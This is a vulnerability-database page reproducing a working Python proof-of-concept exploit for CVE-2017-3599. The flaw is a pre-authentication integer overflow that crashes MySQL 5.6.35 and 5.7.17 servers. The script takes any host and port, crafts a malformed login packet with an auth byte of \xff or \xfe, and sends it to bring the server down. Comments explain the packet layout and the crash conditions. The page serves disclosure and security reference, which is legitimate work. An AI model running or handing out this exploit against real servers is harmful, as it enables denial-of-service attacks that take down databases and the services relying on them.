Vulners
Lucene search
MySQL 5.6.35 / 5.7.17 Integer Overflow Exploit
10
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
print "Usage: python " + sys.argv[0] + " host [port]"
exit(0)
else:
HOST = sys.argv[1]
if len(sys.argv)>2:
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
else:
PORT = 3306
print "[+] Creating packet..."
'''
3 bytes Packet lenth
1 bytes Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)
packet_auth = '\xff' # both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connected."
except:
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
s.close()
print "[+] Exiting."
exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 May 2017 00:00Current
8High risk
Vulners AI Score8
EPSS0.87337